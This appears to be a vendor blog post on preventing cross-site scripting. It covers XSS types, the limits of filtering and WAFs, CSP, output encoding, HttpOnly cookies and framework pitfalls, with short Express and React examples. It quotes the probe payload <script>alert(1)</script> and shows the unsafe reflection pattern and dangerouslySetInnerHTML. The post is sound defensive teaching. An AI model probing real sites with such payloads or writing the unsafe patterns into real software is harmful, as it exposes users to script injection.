At its core, XSS is a type of injection attack just like SQL injection, except you’re injecting JavaScript code rather than SQL instructions. But unlike SQL injection, where you’re always trying to mess with an SQL query, there are many different types of cross-site scripting, depending on how the malicious code is delivered and executed. The XSS section in Invicti Learn goes into far more detail, but broadly speaking, there are three main types of XSS attacks:

  • Reflected XSS attacks: The classic XSS vulnerability is to take a raw input parameter value from an HTTP request and directly use it in the output, thus reflecting any malicious code from the input and executing it in the victim’s browser. While this is the most common type of XSS, its effects are limited to a single user and browser (see the sketch after this list).
  • Stored XSS attacks: To inject JavaScript into multiple browsers, a malicious hacker can try to slip an XSS payload into a backend resource that will be accessed by many users. If the payload is stored as-is and the web server doesn’t sanitize it upon loading, a single entry in a database or serialized file could result in XSS across thousands of browsers when they load that entry.
  • DOM-based XSS attacks: Instead of preloading all the page code at once, many web applications rewrite their internal document object model (DOM) as the app executes without reloading the page. If an attacker manages to inject malicious JavaScript code into the DOM and have it execute, that code will only ever exist in the user’s browser, making these attacks invisible (and impossible to prevent) on the server side.
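
To make the reflected case concrete, here is a sketch using Node.js with Express (route and parameter names are made up for illustration), showing the vulnerable pattern and a minimally encoded fix:

const express = require("express");
const app = express();

app.get("/search", (req, res) => {
  const q = String(req.query.q || "");
  // Vulnerable: res.send("<p>Results for " + q + "</p>") reflects raw input
  // Safer: HTML-encode the value before reflecting it into the page
  const safe = q.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
  res.send("<p>Results for " + safe + "</p>");
});

app.listen(3000);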

The only thing all XSS vulnerabilities have in common is that they allow JavaScript code to exist somewhere in the inputs or outputs of an application. So maybe you could simply look out for that code and block it? That’s what XSS filters tried to do—and it didn’t work, in the long run.

Why you can’t trust XSS filtering

Early approaches to XSS prevention relied on stripping out script tags from inputs, starting with DIY filtering functions that eventually grew into heavyweight filters built into the web browser. The problem was that while reliably identifying and blocking a specific payload is easy, creating more general patterns to stop malicious scripts without interfering with legitimate ones proved all but impossible. Our blog post on the rise and fall of XSS Auditor in Google Chrome tells the fascinating story of all the things that can go wrong with XSS filtering (including how it can create its own security vulnerabilities), so check that out for details.

Long story short—XSS filtering doesn’t work and can’t be trusted as your only line of defense against cross-site scripting attacks. While most web application firewalls (WAFs) do have built-in XSS filters that may stop basic probing attacks, XSS filter evasion to bypass WAF rules is the bread and butter of any serious attacker. So, while it doesn’t hurt to have that option enabled if your WAF provides it, you should never rely on any XSS filter to provide useful protection from attacks.

Cross-site scripting in APIs

The stereotypical XSS attack is someone typing <script>alert(1)</script> into a form field or URL parameter—but what about cross-site scripting in modern API-driven apps? With the backend now acting as a separate data provider for any number of frontends communicating with it via APIs, there’s no way to do centralized XSS prevention on the server. API requests that include sensitive data are a valid and attractive target for attackers, making XSS a very real threat even without a form field in sight.


Read more about why APIs make XSS prevention a frontend job.

Layered security best practices are the way to prevent XSS

There is no silver bullet to magically protect your apps from cross-site scripting. Especially with full-stack JavaScript applications and the ubiquity of APIs, there are simply too many avenues of attack and too many code interactions to catch them all. And yet, if you follow a handful of secure practices to build up multiple layers of resistance, you can make successful and impactful XSS attacks extremely unlikely.

The winning combination is to dramatically limit your attack surface with the right CSP headers while also using secure coding practices and tools to minimize the number of XSS vulnerabilities that make it to production. Top this off with regular vulnerability scanning using a quality DAST tool and you should have XSS well under control.


Frequently asked questions

What is the best way to prevent XSS attacks?

Preventing XSS requires a combination of secure configuration and secure coding practices. Configuring the right Content Security Policy (CSP) header values is the most effective way to quickly improve the security of your website or web application by blocking the loading of unexpected scripts. Input validation and sanitization are also a must, combined with context-sensitive output encoding.


Learn more about using Content Security Policy to secure web applications

Can you use filtering to stop XSS attacks?

XSS filtering is never completely effective because attackers have many ways of bypassing WAF rules and getting their XSS payloads to your application. Filtering in the browser or the application itself is also never watertight, requires constant maintenance, and can cause problems with legitimate scripts. While web application firewalls provide some basic XSS filters, they won’t stop more advanced attacks and shouldn’t be relied on as your only line of defense.


Learn more about the many possibilities for XSS filter evasion

Does using HttpOnly cookies prevent cross-site scripting?

Setting the HttpOnly flag in cookies is a security measure that makes those cookies inaccessible to client-side scripts but does not actually prevent XSS attacks. Even so, using HttpOnly cookies is a recommended cybersecurity practice to protect session tokens and similar user data from malicious scripts.
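
For reference, the flag is set as part of the Set-Cookie response header (the cookie name and value are placeholders):

Set-Cookie: sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Strict

With HttpOnly set, the cookie is still sent along with requests as usual, but it no longer appears in document.cookie, so an injected script cannot simply read and exfiltrate it.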


Learn more about cookie security and security-related cookie flags

Can you prevent cross-site scripting by using a framework like React, Angular, or Vue?

When used correctly, modern JavaScript frameworks can prevent the majority of XSS vulnerabilities by default. In some cases, though, cross-site scripting is still possible in framework-based applications, especially when developers deliberately or unknowingly use some of the available unsafe constructs and feed them unsanitized user inputs.
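
The best-known unsafe construct in React is dangerouslySetInnerHTML, which deliberately opts out of React’s default escaping (userComment here stands in for any attacker-influenced value):

// Safe by default: React escapes interpolated values
<p>{userComment}</p>

// Unsafe opt-out: raw HTML is rendered, so injected markup can execute
<div dangerouslySetInnerHTML={{ __html: userComment }} />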


Learn more about cross-site scripting in React web applications

The post How to prevent XSS attacks appeared first on Invicti.

]]>